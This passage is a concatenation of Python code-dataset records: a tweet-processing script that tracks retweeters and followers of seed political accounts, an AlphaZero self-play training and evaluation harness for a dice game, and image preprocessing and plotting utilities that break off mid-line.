seed_retweets[[\"screen_name\",\"user_id\"]].drop_duplicates()\n \n new_retweeters.to_csv('data/processed/retweeters_users.csv', index=False, mode='a')\n n_retweets = len(seed_retweets)\n n_rtters = len(new_retweeters)\n\n # Collecting candace and charlies retweets\n\n seed_retweets = self.tweets[ self.tweets.rt_from_screen_name.isin(screen_names_cc) | ### retweet\n (\n (self.tweets.rt_from_id.isna()) &\n (self.tweets.in_reply_to_screen_name.isin(screen_names_cc) &\n (self.tweets.in_reply_to_status_id.notna()))) | ### reply\n (\n (self.tweets.rt_from_id.isna()) &\n (self.tweets.qt_from_screen_name.isin(screen_names_cc))) ### quote\n ]\n\n\n if not os.path.isfile('data/processed/seed_retweets/retweets_from_seeds_cc_{}.csv'.format(time.strftime(\"%y%W\"))):\n seed_retweets.to_csv(\"data/processed/seed_retweets/retweets_from_seeds_cc_{}.csv\".format(time.strftime(\"%y%W\")), index=False)\n else:\n seed_retweets.to_csv(\"data/processed/seed_retweets/retweets_from_seeds_cc_{}.csv\".format(time.strftime(\"%y%W\")), index=False, header=False, mode='a')\n\n\n print(\">>> Extracting retweeters screen_name and id, saving to data/retweeters_users_cc.csv\")\n if 'retweeters_users_cc.csv' in os.listdir('data/'):\n current_retweeters = pd.read_csv('data/processed/retweeters_users_cc.csv')[[\"screen_name\",\"user_id\"]]\n new_retweeters = seed_retweets[~seed_retweets.user_id.isin(current_retweeters.user_id)][[\"screen_name\",\"user_id\"]]\n new_retweeters = new_retweeters.drop_duplicates()\n else:\n new_retweeters = seed_retweets[[\"screen_name\",\"user_id\"]].drop_duplicates()\n\n new_retweeters.to_csv('data/processed/retweeters_users_cc.csv', index=False, mode='a')\n \n n_retweets_cc = len(seed_retweets)\n n_rtters_cc = len(new_retweeters)\n\n report = pd.DataFrame({\"date\":[self.day_to_process], \"new_seed_tweets\":[self.len_new_tweets], \"n_retweet\":[n_retweets],\\\n \"new_rtters\":[n_rtters], \"new_rtweets_cc\":[n_retweets_cc], \"new_rtters_cc\":[n_rtters_cc]})\n if not os.path.isfile('process_report.csv'):\n report.to_csv(\"process_report.csv\", index=False)\n else:\n report.to_csv(\"process_report.csv\", index=False, header=False, mode='a')\n\n def unify_daily_followers_list(self):\n '''Takes all seed and retweeters followers files\n (different hours or access points) and creates a single dataframe\n to collect their profiles'''\n seed_files = os.listdir('data/processed/seed_followers')\n seed_files = [f for f in seed_files if 'seed_followers_{}'.format(self.day_to_process) in f]\n print(seed_files)\n all_files = []\n for file in seed_files:\n all_files.append(pd.read_csv('data/processed/seed_followers/{}'.format(file), header = None))\n\n daily_seed_followers = pd.concat(all_files)\n daily_seed_followers.columns = ['ego', 'follower']\n daily_seed_followers.drop_duplicates(['ego','follower'], inplace=True)\n daily_seed_followers.to_csv('data/processed/seed_followers/seed_daily_followers_{}.csv'.format(self.day_to_process), index=False)\n\n del daily_seed_followers\n del all_files\n\n retweeters_files = os.listdir('data/processed/retweeters_followers')\n retweeters_files = [f for f in retweeters_files if 'retweeters_followers_{}'.format(self.day_to_process) in f]\n print(retweeters_files)\n all_files = []\n for file in retweeters_files:\n print(file)\n try:\n all_files.append(pd.read_csv('data/processed/retweeters_followers/{}'.format(file), header = None))\n except Exception as e:\n print(e)\n\n try:\n daily_retweeters_followers = pd.concat(all_files[:8])\n daily_retweeters_followers.columns = ['ego', 'follower']\n daily_retweeters_followers.drop_duplicates(['ego','follower'], inplace=True)\n daily_retweeters_followers.to_csv('data/processed/retweeters_followers/retweeters_daily_followers_{}_0.csv'.format(self.day_to_process), index=False)\n except:\n pass\n try:\n daily_retweeters_followers = pd.concat(all_files[8:])\n daily_retweeters_followers.columns = ['ego', 'follower']\n daily_retweeters_followers.drop_duplicates(['ego','follower'], inplace=True)\n daily_retweeters_followers.to_csv('data/processed/retweeters_followers/retweeters_daily_followers_{}_1.csv'.format(self.day_to_process), index=False)\n except:\n pass\n\nif __name__ == \"__main__\":\n ### Designed to be processed daily with a cron job\n\n users = pd.read_csv(\"data/seed_users.csv\")\n user_ids = [\"id_\" + str(x) for x in users.user_id.values]\n\n ### Separating candace owens and charlie kirk to manage engagement processing\n screen_names_cc = ['RealCandaceO','charliekirk11']\n screen_names_rest = [x for x in users.screen_name.values if x not in screen_names_cc]\n \n yesterday = dt.datetime.strftime(dt.datetime.now() - dt.timedelta(1), '%y%m%d')\n\n print(\"Processing day: \", yesterday)\n process_tweets(day_to_process=yesterday)\n\n","sub_path":"data_collection/process_tweets.py","file_name":"process_tweets.py","file_ext":"py","file_size_in_byte":18735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"208225094","text":"from game import Game\nimport time\nimport copy\nimport os\nimport pickle\nimport psutil\nimport os.path\nimport gc\nfrom players.vanilla_uct_player import Vanilla_UCT\nfrom players.alphazero_player import AlphaZeroPlayer\nfrom players.uct_player import UCTPlayer\nfrom statistics import Statistic\nfrom concurrent.futures import ProcessPoolExecutor\n\nclass Experiment:\n\n def __init__(self, n_players, dice_number, dice_value, column_range,\n offset, initial_height, max_game_length, reg, conv_number, n_cores):\n \"\"\"n_cpus is the number of cores used for parallel computations. \"\"\"\n self.n_players = n_players\n self.dice_number = dice_number\n self.dice_value = dice_value\n self.column_range = column_range \n self.offset = offset\n self.initial_height = initial_height\n self.max_game_length = max_game_length\n self.reg = reg\n self.conv_number = conv_number\n self.n_cores = n_cores\n\n def _play_single_game(self, args):\n \"\"\"\n Play a single game between player1 and player2.\n Return the data of the game in a NN channel format and who won.\n If the game reaches the maximum number of iterations, it returns 0\n 0 representing a draw. \n Return an empty list if none of the players are instances of \n AlphaZeroPlayer or the data collected from the game otherwise.\n Return 1 if player1 won and 2 if player2 won.\n \"\"\"\n\n player1 = args[0]\n player2 = args[1]\n type_of_game = args[2]\n player1_weights = args[3]\n player2_weights = args[4]\n\n from keras import backend as K \n K.set_image_data_format('channels_first') \n # Selfplay\n if type_of_game == 's':\n from models import define_model\n current_model = define_model(\n reg = self.reg, \n conv_number = self.conv_number, \n column_range = self.column_range, \n offset = self.offset, \n initial_height = self.initial_height, \n dice_value = self.dice_value\n )\n \n copy_model = define_model(\n reg = self.reg, \n conv_number = self.conv_number, \n column_range = self.column_range, \n offset = self.offset, \n initial_height = self.initial_height, \n dice_value = self.dice_value\n )\n\n player1.network = current_model\n player2.network = copy_model\n \n player1.network.set_weights(player1_weights)\n player2.network.set_weights(player1_weights)\n # Evaluation vs network\n elif type_of_game == 'en':\n from models import define_model\n current_model = define_model(\n reg = self.reg, \n conv_number = self.conv_number, \n column_range = self.column_range, \n offset = self.offset, \n initial_height = self.initial_height, \n dice_value = self.dice_value\n )\n \n old_model = define_model(\n reg = self.reg, \n conv_number = self.conv_number, \n column_range = self.column_range, \n offset = self.offset, \n initial_height = self.initial_height, \n dice_value = self.dice_value\n )\n\n player1.network = current_model\n player2.network = old_model\n player1.network.set_weights(player1_weights)\n player2.network.set_weights(player2_weights)\n \n # Evaluation vs UCTs\n elif type_of_game == 'eu':\n from models import define_model\n network = define_model(\n reg = self.reg, \n conv_number = self.conv_number, \n column_range = self.column_range, \n offset = self.offset, \n initial_height = self.initial_height, \n dice_value = self.dice_value\n )\n if player1_weights != None:\n player1.network = network\n player1.network.set_weights(player1_weights)\n else:\n player2.network = network\n player2.network.set_weights(player2_weights)\n\n data_of_a_game = []\n game = Game(self.n_players, self.dice_number, self.dice_value, \n self.column_range, self.offset, self.initial_height)\n\n is_over = False\n rounds = 0\n # actions_taken actions in a row from a player. \n # List of tuples (action taken, player turn, Game instance).\n # If players change turn, empty the list.\n actions_taken = []\n actions_from_player = 1\n\n # Loop of the game\n while not is_over:\n rounds += 1\n # Collecting data for later input to the NN if any of the players \n # are subclasses of AlphaZeroPlayer.\n if isinstance(player1, AlphaZeroPlayer) and game.player_turn == 1:\n channel_valid = player1.valid_positions_channel(\n self.column_range, self.offset, \n self.initial_height\n )\n channel_finished_1, channel_finished_2 = \\\n player1.finished_columns_channels(\n game, channel_valid\n )\n channel_won_column_1, channel_won_column_2 = \\\n player1.player_won_column_channels(\n game, channel_valid\n )\n channel_turn = player1.player_turn_channel(game, channel_valid)\n list_of_channels = [channel_valid, \n channel_finished_1, channel_finished_2,\n channel_won_column_1, channel_won_column_2,\n channel_turn\n ]\n elif isinstance(player2, AlphaZeroPlayer) and game.player_turn == 2:\n channel_valid = player2.valid_positions_channel(\n self.column_range, self.offset, \n self.initial_height\n )\n channel_finished_1, channel_finished_2 = \\\n player2.finished_columns_channels(\n game, channel_valid\n )\n channel_won_column_1, channel_won_column_2 = \\\n player2.player_won_column_channels(\n game, channel_valid\n )\n channel_turn = player2.player_turn_channel(game, channel_valid)\n list_of_channels = [channel_valid, \n channel_finished_1, channel_finished_2,\n channel_won_column_1, channel_won_column_2,\n channel_turn\n ]\n moves = game.available_moves()\n if game.is_player_busted(moves):\n actions_taken = []\n actions_from_player = game.player_turn\n continue\n else:\n if game.player_turn == 1:\n if actions_from_player == game.player_turn:\n chosen_play = player1.get_action(game, [])\n else:\n chosen_play = player1.get_action(game, actions_taken)\n dist_probability = []\n if isinstance(player1, UCTPlayer):\n dist_probability = player1.get_dist_probability()\n else:\n if actions_from_player == game.player_turn:\n chosen_play = player2.get_action(game, [])\n else:\n chosen_play = player2.get_action(game, actions_taken)\n dist_probability = []\n if isinstance(player2, UCTPlayer):\n dist_probability = player2.get_dist_probability()\n if isinstance(player1, AlphaZeroPlayer) \\\n and isinstance(player2, AlphaZeroPlayer):\n # Collecting data for network\n current_play = [list_of_channels, dist_probability]\n data_of_a_game.append(current_play)\n\n # Needed because game.play() can automatically change \n # the player_turn attribute.\n actual_player = game.player_turn\n \n # Clear the plays info so far if player_turn \n # changed last iteration.\n if actions_from_player != actual_player:\n actions_taken = []\n actions_from_player = game.player_turn\n\n # Apply the chosen_play in the game\n game.play(chosen_play)\n\n # Save game history\n actions_taken.append((chosen_play, actual_player, \n game.clone())\n )\n\n # if the game has reached its max number of plays, end the game\n # and who_won receives 0, which means no players won.\n\n if rounds > self.max_game_length:\n who_won = 0\n is_over = True\n else:\n who_won, is_over = game.is_finished()\n\n # Game is over, so resets the trees\n player1.reset_tree()\n player2.reset_tree()\n return data_of_a_game, who_won\n\n def _selfplay(self, current_model, current_weights, dataset_for_network, \n n_games, file_name):\n\n with open(file_name, 'a') as f:\n print('SELFPLAY', file=f)\n from keras import backend as K \n print(K.image_data_format(), file=f) \n\n start_selfplay = time.time()\n # 0 -> draw\n victory_0 = 0\n victory_1 = 0\n victory_2 = 0\n\n copy_model = current_model.clone()\n\n # ProcessPoolExecutor() will take care of joining() and closing()\n # the processes after they are finished.\n with ProcessPoolExecutor(max_workers=self.n_cores) as executor:\n # Specify which arguments will be used for each parallel call\n args = (\n (current_model, copy_model, 's', current_weights, None) \n for _ in range(n_games)\n )\n # data is a list of 2-tuples = (data_of_a_game, who_won) \n results = executor.map(self._play_single_game, args)\n data_of_all_games = []\n for result in results:\n data_of_all_games.append(result)\n \n for single_game in data_of_all_games:\n data_of_a_game = single_game[0]\n who_won = single_game[1]\n if who_won == 1:\n victory_1 += 1\n elif who_won == 2:\n victory_2 += 1\n else:\n victory_0 += 1\n # Store who actually won in all states\n for state in data_of_a_game:\n if who_won == 1:\n state.append(1)\n elif who_won == 2:\n state.append(-1)\n # Save the data only if it was not a draw\n if who_won != 0:\n dataset_for_network.append(data_of_a_game)\n \n del copy_model\n\n elapsed_time_selfplay = time.time() - start_selfplay\n\n with open(file_name, 'a') as f:\n print(' Selfplay - Player 1 won', victory_1, 'time(s).', \\\n file=f)\n print(' Selfplay - Player 2 won', victory_2, 'time(s).', \\\n file=f)\n print(' Selfplay - Ties:', victory_0, file=f)\n print(' Time elapsed in Selfplay:', elapsed_time_selfplay,\\\n file=f)\n print(' Average time of a game: ', elapsed_time_selfplay \\\n / n_games, 's', sep = '', file=f)\n\n return victory_0, victory_1, victory_2\n\n def _training(self, args):\n current_model = args[0]\n current_weights = args[1]\n dataset_for_network = args[2]\n n_training_loop = args[3]\n mini_batch = args[4]\n epochs = args[5]\n victory_0 = args[6]\n victory_1 = args[7]\n victory_2 = args[8]\n file_name = args[9]\n with open(file_name, 'a') as f:\n print('TRAINING LOOP', file=f)\n \n start_training = time.time()\n\n\n # Transform the dataset collected into network input\n channels_input, valid_actions_dist_input, dist_probs_label, \\\n who_won_label = current_model.transform_dataset_to_input(\n dataset_for_network\n )\n \n from models import define_model\n from keras import backend as K\n K.set_image_data_format('channels_first') \n\n model = define_model(\n reg = self.reg, \n conv_number = self.conv_number, \n column_range = self.column_range, \n offset = self.offset, \n initial_height = self.initial_height, \n dice_value = self.dice_value\n )\n model.set_weights(current_weights)\n current_model.network = model\n \n for i in range(n_training_loop):\n # Sample random mini_batch inputs for training\n x_train, y_train = current_model.sample_input(\n channels_input, valid_actions_dist_input, \n dist_probs_label, who_won_label, \n mini_batch\n )\n\n history_callback = current_model.network.fit(\n x_train, y_train, epochs = epochs, \n shuffle = True, verbose = 0\n )\n\n if i == n_training_loop - 1:\n # Saving data\n loss = sum(history_callback.history[\"loss\"]) \\\n / len(history_callback.history[\"loss\"])\n dist_metric = \\\n sum(history_callback.history[\n \"Output_Dist_categorical_crossentropy\"\n ]) \\\n / len(history_callback.history[\n \"Output_Dist_categorical_crossentropy\"\n ])\n value_metric = \\\n sum(history_callback.history[\n \"Output_Value_mean_squared_error\"\n ]) \\\n / len(history_callback.history[\n \"Output_Value_mean_squared_error\"\n ])\n \n training_tuple = (\n loss, dist_metric, value_metric,\n victory_0, victory_1, victory_2\n )\n\n elapsed_time_training = time.time() - start_training\n \n current_weights = current_model.network.get_weights()\n current_model.network = None\n\n\n with open(file_name, 'a') as f:\n print(' Time elapsed of training:',\n elapsed_time_training, file=f)\n \n print(' Total loss:', loss, file=f)\n print(' Dist. error:', dist_metric, file=f)\n print(' Value error:', value_metric, file=f)\n\n return current_weights, training_tuple\n\n def _evaluation(self, current_model, cur_weights, old_weights,\n data_net_vs_net_eval, n_games_evaluate, victory_rate, file_name):\n\n with open(file_name, 'a') as f:\n print('MODEL EVALUATION - Network vs. Old Network', file=f)\n\n # The current network faces the previous one.\n # If it does not win victory_rate % it completely\n # discards the current network.\n\n victory_0_eval = 0 # Draw\n victory_1_eval = 0 # Current model\n victory_2_eval = 0 # Old model\n\n start_eval = time.time()\n\n old_model = current_model.clone()\n # We do n_games//2 parallel games. Each of the operations we switch \n # who is the first player to avoid first player winning bias.\n\n # ProcessPoolExecutor() will take care of joining() and closing()\n # the processes after they are finished.\n with ProcessPoolExecutor(max_workers=self.n_cores) as executor:\n # Specify which arguments will be used for each parallel call\n args = (\n (current_model, old_model, 'en', cur_weights, old_weights) \n for _ in range(n_games_evaluate//2)\n )\n results_1 = executor.map(self._play_single_game, args)\n\n with ProcessPoolExecutor(max_workers=self.n_cores) as executor:\n # Specify which arguments will be used for each parallel call\n args = (\n (old_model, current_model, 'en', old_weights, cur_weights) \n for _ in range(n_games_evaluate//2)\n ) \n results_2 = executor.map(self._play_single_game, args)\n \n for result in results_1:\n if result[1] == 1:\n victory_1_eval += 1\n elif result[1] == 2:\n victory_2_eval += 1\n else:\n victory_0_eval += 1\n\n for result in results_2:\n if result[1] == 2:\n victory_1_eval += 1\n elif result[1] == 1:\n victory_2_eval += 1\n else:\n victory_0_eval += 1\n \n elapsed_time_eval = time.time() - start_eval\n\n data_net_vs_net_eval.append(\n (victory_0_eval, victory_1_eval, victory_2_eval)\n )\n\n necessary_won_games = (victory_rate * n_games_evaluate) / 100\n\n if victory_1_eval < necessary_won_games:\n with open(file_name, 'a') as f:\n print(' New model is worse...', file=f)\n print(' New model victories:', victory_1_eval, file=f)\n print(' Old model victories:', victory_2_eval, file=f)\n print(' Draws:', victory_0_eval, file=f)\n print(' Time elapsed in evaluation (Net vs. Net):', \n elapsed_time_eval, file=f)\n print(' Average time of a game: ', \\\n elapsed_time_eval / n_games_evaluate, \\\n 's', sep = '', file=f)\n\n return False\n else:\n with open(file_name, 'a') as f:\n print(' New model is better!', file=f)\n print(' New model victories:', victory_1_eval, file=f)\n print(' Old model victories:', victory_2_eval, file=f)\n print(' Draws:', victory_0_eval, file=f)\n print(' Time elapsed in evaluation (Net vs. Net):', \n elapsed_time_eval, file=f)\n print(' Average time of a game: ', \\\n elapsed_time_eval / n_games_evaluate, \\\n 's', sep = '', file=f)\n\n return True\n\n def play_alphazero(self, current_model, current_weights, use_UCT_playout, \n epochs, alphazero_iterations, mini_batch, n_training_loop, n_games, \n n_games_evaluate, victory_rate, dataset_size, iteration):\n \"\"\"\n - current_model is an instance of AlphaZeroPlayer.\n - epochs is the number of epochs usued in the training stage.\n - alphazero_iterations is the total number of iterations of the \n learning algorithm: selfplay -> training loop -> evaluate network.\n - mini_batch is the number of data sampled from the whole dataset for \n one single training iteration.\n - n_training_loop is the number of training iterations after self-play.\n - n_games is the number of games played in the self-play stage.\n - n_games_evaluate is the number of games played in the evaluation\n stage.\n - victory_rate is the % of victories necessary for the new network to\n overwrite the previous one.\n - dataset_size is the max nubmer of games stored in memory for \n training. \n - iteration is an integer referring to which iteration AZ is at the\n moment.\n \"\"\"\n\n \n\n file_name = str(current_model.n_simulations) + '_' + str(n_games) \\\n + '_' + str(alphazero_iterations) + '_' \\\n + str(self.conv_number) + '_' + str(use_UCT_playout) + '.txt'\n\n dataset_file = str(current_model.n_simulations) + '_' + str(n_games) \\\n + '_' + str(alphazero_iterations) + '_' \\\n + str(self.conv_number) + '_' + str(use_UCT_playout) \\\n + '_dataset'\n\n current_weights_file = str(current_model.n_simulations) + '_' \\\n + str(n_games) + '_' + str(alphazero_iterations) + '_' \\\n + str(self.conv_number) + '_' + str(use_UCT_playout) \\\n + '_currentweights'\n old_weights_file = str(current_model.n_simulations) + '_' \\\n + str(n_games) + '_' + str(alphazero_iterations) + '_' \\\n + str(self.conv_number) + '_' + str(use_UCT_playout) \\\n + '_oldweights'\n \n\n with open(file_name, 'a') as f:\n print('ALPHAZERO ITERATION -', iteration, file=f)\n \n process = psutil.Process(os.getpid())\n memory = process.memory_info().rss / 1000000\n with open(file_name, 'a') as f:\n print('Current usage of RAM (mb): ', memory, file=f)\n\n # dataset_for_network stores a list of info used as input for the \n # network.\n # A list of: states of the game, distribution probability of the state\n # returned by the UCT and who won the game this state is in.\n dataset_for_network = []\n\n # If there is a file that contains data for training, read it\n if os.path.exists(dataset_file):\n with open(dataset_file, 'rb') as file:\n dataset_for_network = pickle.load(file)\n\n if current_weights == None:\n raise Exception('You must run generate_default_weights.py.' + \\\n ' This is needed for the first call of' + \\\n ' selfplay in order to all concurrent calls' + \\\n ' run with the same network weights.'\n )\n\n # Stores data from net vs net in training for later analysis.\n data_net_vs_net_training = []\n # Stores data from net vs net in evaluation for later analysis.\n data_net_vs_net_eval = []\n\n start = time.time()\n\n #\n #\n # Self-play\n #\n #\n\n victory_0, victory_1, victory_2 = self._selfplay(\n current_model,\n current_weights, \n dataset_for_network, \n n_games,\n file_name\n )\n \n # This means all of the selfplay games (from the first iteration) \n # ended in a draw.\n # This is not interesting since it does not add any valued info \n # for the network training. Stops this iteration.\n if len(dataset_for_network) == 0:\n with open(file_name, 'a') as f:\n print(' All selfplay games ended in a draw.' \n + ' Stopping current iteration.', file=f)\n return\n\n #\n #\n # Training\n #\n #\n\n \n\n #old_weights = None\n #old_model = current_model.clone()\n\n # Save the model weights before training for later evaluation\n with open(old_weights_file, 'wb') as file:\n pickle.dump(current_weights, file)\n\n current_dataset_size = len(dataset_for_network)\n to_delete = current_dataset_size - dataset_size\n\n # If the current dataset is bigger than dataset_size, then removes\n # the oldest games accordingly.\n if current_dataset_size > dataset_size:\n del dataset_for_network[:to_delete]\n\n # This is a little hack in order to tensorflow to not be stuck in a\n # deadlock at net evaluation. Apparently, for parallel calls to work\n # with tf.keras models, no tf.keras models should be instantiated in\n # the main process (such as the way we did in the selfplay stage, we\n # instantiate the models inside each parallel process). Therefore, \n # we call the training stage in a single \"parallel\" call; this way,\n # the define_model() will be called in a separate process rather than\n # the main one so we are able to run the net evaluation later with no\n # deadlocks.\n with ProcessPoolExecutor(max_workers=self.n_cores) as executor:\n # Specify which arguments will be used for each parallel call\n args = (\n (current_model,\n current_weights,\n dataset_for_network,\n n_training_loop, \n mini_batch,\n epochs,\n victory_0, \n victory_1, \n victory_2, \n file_name) \n for _ in range(1)\n )\n # 2-tuple = (current_weights, training_tuple) \n results = executor.map(self._training, args)\n\n for result in results:\n current_weights = result[0]\n training_tuple = result[1]\n\n data_net_vs_net_training.append(training_tuple)\n\n # Save the current model weights after training for later evaluation.\n # This seems redundant since we read from file right after, but it is\n # stored in file in case of unexpected problems for logging purposes.\n with open(current_weights_file, 'wb') as file:\n pickle.dump(current_weights, file)\n\n # Since the selfplay data is not important from now on, free the \n # memory and save the data in a file for later usage in the next\n # AZ iteration.\n with open(dataset_file, 'wb') as file:\n pickle.dump(dataset_for_network, file)\n dataset_for_network = []\n\n # Load from file current and old weights for evaluation\n if os.path.exists(current_weights_file):\n with open(current_weights_file, 'rb') as file:\n current_weights = pickle.load(file)\n else:\n raise Exception('Current weights file was not located.')\n\n if os.path.exists(old_weights_file):\n with open(old_weights_file, 'rb') as file:\n old_weights = pickle.load(file)\n else:\n raise Exception('Old weights file was not located.')\n\n old_model = current_model.clone()\n\n #\n # \n # Model evaluation\n #\n #\n\n won = self._evaluation(\n current_model,\n current_weights,\n old_weights,\n data_net_vs_net_eval, \n n_games_evaluate, \n victory_rate,\n file_name\n )\n\n if not won:\n # New model is worse, therefore we can copy old_model weights\n # to current_model to be used in the next AZ iteration.\n # This way, we are discarding everything current_model learned \n #during the learning stage because it was worse than old_model.\n current_weights = old_weights\n # Save the current model weights with the old weights since it has\n # lost against the old weights.\n with open(current_weights_file, 'wb') as file:\n pickle.dump(current_weights, file)\n\n # Saves this iteration's data to file\n stats = Statistic(\n data_net_vs_net_training, \n data_net_vs_net_eval, \n None, \n n_simulations = current_model.n_simulations, \n n_games = n_games, \n alphazero_iterations = alphazero_iterations, \n use_UCT_playout = use_UCT_playout, \n conv_number = self.conv_number\n )\n stats.save_to_file(iteration, won = won)\n stats.save_model_to_file(current_weights, iteration, won = won)\n stats.save_player_config(current_model, iteration, won = won)\n\n # At this point, we don't need the local files that stores current\n # and old files anmore since the weights are properly stored in\n # another folder, so delete them.\n os.remove(current_weights_file)\n os.remove(old_weights_file)\n\n elapsed_time = time.time() - start\n import gc\n gc.collect()\n\n process = psutil.Process(os.getpid())\n memory = process.memory_info().rss / 1000000\n with open(file_name, 'a') as f:\n print('Time elapsed of this AZ iteration: ', \n elapsed_time, file=f)\n print('Current usage of RAM (mb): ', memory, file=f)\n print(file=f)\n \n\n def play_network_versus_UCT(self, network, weights, stat, networks_dir, \n prefix_name, UCTs_eval, n_games_evaluate):\n \"\"\"\n Play the network against three baseline UCTs and save all the data\n accordingly.\n \n - network is an AlphaZeroPlayer that won against a previous network \n and for evaluation purposes will now face the UCTs.\n - stat is an instance of Statistics that stores data related to this\n player. It is used to generate a report.\n - networks_dir is the directory where all info about the current \n experiment is located.\n - prefix_name is a string used to identify the configs used in this \n experiment, as well as the AZ iteration it corresponds to.\n - UCTs_eval is a list of Vanilla_UCT players used in evaluation.\n - n_games_evaluate is the number of games played between the network\n and the vanilla UCTs.\n \"\"\"\n\n start = time.time()\n\n file_name = networks_dir + '/results_uct/'\n file_name_data = networks_dir + '/results_uct/' + prefix_name + '_data'\n\n # Create the target directory if it is not created yet\n if not os.path.exists(file_name):\n os.makedirs(file_name)\n\n file_name = file_name + prefix_name + '_log_uct.txt'\n # Stores data from net vs uct in evaluation for later analysis.\n data_net_vs_uct = []\n\n # List of victories of each vanilla UCTs\n victory_0_eval = [0 for i in range(len(UCTs_eval))]\n victory_1_eval = [0 for i in range(len(UCTs_eval))]\n victory_2_eval = [0 for i in range(len(UCTs_eval))]\n\n iteration = prefix_name.rsplit('_', 1)[-1]\n\n with open(file_name, 'a') as f:\n print('ALPHAZERO ITERATION -', iteration, file=f)\n\n process = psutil.Process(os.getpid())\n memory = process.memory_info().rss / 1000000\n with open(file_name, 'a') as f:\n print('Current usage of RAM (mb): ', memory, file=f)\n\n for ucts in range(len(UCTs_eval)):\n with open(file_name, 'a') as f:\n print('MODEL EVALUATION - Network vs. UCT - ', \n UCTs_eval[ucts].n_simulations,' simulations', file=f)\n\n start_evaluate_uct = time.time()\n # We do n_games//2 parallel games. Each of the operations we switch \n # who is the first player to avoid first player winning bias.\n with ProcessPoolExecutor(max_workers=self.n_cores) as executor:\n # Specify which arguments will be used for each parallel call\n args = (\n (network, UCTs_eval[ucts], 'eu', weights, None) \n for _ in range(n_games_evaluate//2)\n )\n results_1 = executor.map(self._play_single_game, args)\n\n with ProcessPoolExecutor(max_workers=self.n_cores) as executor:\n # Specify which arguments will be used for each parallel call\n args = (\n (UCTs_eval[ucts], network, 'eu', None, weights) \n for _ in range(n_games_evaluate//2)\n ) \n results_2 = executor.map(self._play_single_game, args)\n\n for result in results_1:\n if result[1] == 1:\n victory_1_eval[ucts] += 1\n elif result[1] == 2:\n victory_2_eval[ucts] += 1\n else:\n victory_0_eval[ucts] += 1\n\n for result in results_2:\n if result[1] == 2:\n victory_1_eval[ucts] += 1\n elif result[1] == 1:\n victory_2_eval[ucts] += 1\n else:\n victory_0_eval[ucts] += 1\n\n elapsed_time_evaluate_uct = time.time() - start_evaluate_uct\n\n with open(file_name, 'a') as f:\n print(' Net vs UCT - Network won', \n victory_1_eval[ucts],'time(s).', file=f)\n print(' Net vs UCT - UCT won', \n victory_2_eval[ucts],'time(s).', file=f)\n print(' Net vs UCT - Draws:', \n victory_0_eval[ucts], file=f)\n print(' Time elapsed in evaluation (Net vs. UCT):', \n elapsed_time_evaluate_uct, file=f)\n print(' Average time of a game: ', \\\n elapsed_time_evaluate_uct / n_games_evaluate, \\\n 's', sep = '', file=f)\n\n gc.collect()\n elapsed_time = time.time() - start\n\n process = psutil.Process(os.getpid())\n memory = process.memory_info().rss / 1000000\n with open(file_name, 'a') as f:\n print('Time elapsed of this evaluation: ', elapsed_time, file=f)\n print('Current usage of RAM (mb): ', memory, file=f)\n print(file=f)\n\n list_of_n_simulations = [uct.n_simulations for uct in UCTs_eval]\n # Saving data\n data_net_vs_uct.append(\n (victory_0_eval, victory_1_eval, victory_2_eval, \n list_of_n_simulations)\n )\n stat.data_net_vs_uct = data_net_vs_uct\n # Save the data of uct\n with open(file_name_data, 'wb') as file:\n pickle.dump(data_net_vs_uct, file)\n # Save the updated stats file\n with open(networks_dir + '/results_uct/' + prefix_name, 'wb') as file:\n pickle.dump(stat.__dict__, file)\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":36305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"425542720","text":"import matplotlib.pyplot as plt\r\nfrom keras.preprocessing import image\r\nfrom PIL import Image\r\nfrom glob import glob\r\nimport numpy as np\r\nimport os\r\n\r\nclass plot:\r\n\r\n def __init__(self, histo, row=1, col=2):\r\n\r\n self.histo = histo\r\n self.row, self.col = row, col\r\n\r\n self.plot_acc()\r\n self.plot_loss()\r\n\r\n plt.show()\r\n\r\n def plot_acc(self):\r\n histo = self.histo\r\n plt.plot(histo.history['acc'])\r\n plt.plot(histo.history['val_acc'])\r\n plt.title('Model Accuracy')\r\n plt.xlabel('Epochs')\r\n plt.ylabel('Accuracy')\r\n plt.legend(['Train', 'Test'], loc=0)\r\n\r\n def plot_loss(self):\r\n histo = self.histo\r\n plt.plot(histo.history['loss'])\r\n plt.plot(histo.history['val_loss'])\r\n plt.title('Model Loss')\r\n plt.xlabel('Epochs')\r\n plt.ylabel('loss')\r\n plt.legend(['Train', 'Test'], loc=0)\r\n\r\nclass preprocess:\r\n\r\n def __init__(self, paths, size = 250, is_sub = True, idx = 20, format='jpg'):\r\n\r\n self.paths, self.size = paths, size\r\n\r\n format = format.lower()\r\n self.format, self.idx = format, idx\r\n\r\n if is_sub:\r\n images = np.asarray([])\r\n for path, _, _ in os.walk(paths):\r\n image_dir = np.asarray(glob(os.path.join(path, '*.'+format)))\r\n images = np.concatenate([images, image_dir])\r\n data = [image.load_img(img) for img in images]\r\n\r\n else:\r\n images = glob(os.path.join(paths, '*.' + format))\r\n data = [image.load_img(img) for img in images]\r\n\r\n self.data = data\r\n\r\n def crop(self):\r\n\r\n data = self.data\r\n cropped_images = []\r\n\r\n for img in data:\r\n w, h = img.size\r\n s = min(w, h)\r\n x = w - s // 1.5\r\n y = h - s // 1.5\r\n imgs = img.crop((x, y, s, s))\r\n cropped_images.append(imgs)\r\n\r\n return cropped_images\r\n\r\n def resize(self, cropped = False, w = 800, h = 400):\r\n size = self.size\r\n\r\n\r\n if cropped:\r\n data = self.crop()\r\n resized = [image.img_to_array(data[img].resize((w, h), Image.ANTIALIAS)) / 255.0 for img in range(len(data))]\r\n\r\n else:\r\n data = self.data\r\n resized = [image.img_to_array(data[img].resize((w, h), Image.ANTIALIAS)) / 255.0 for img in range(len(data))]\r\n\r\n return resized\r\n\r\n def labeling(self, number_of = 100, label = 2):\r\n\r\n rep = 0\r\n lis = []\r\n while rep < label:\r\n data = np.asarray(rep for _ in range(number_of))\r\n total = np.concatenate([lis, data])\r\n rep += 1\r\n\r\n return total\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n path = './'\r\n pre = preprocess(paths = path, is_sub=False, format = 'jpg')\r\n img = pre.resize(w = 800, h = 400)\r\n\r\n from matplotlib import image\r\n image.imsave('룰루2.jpg', 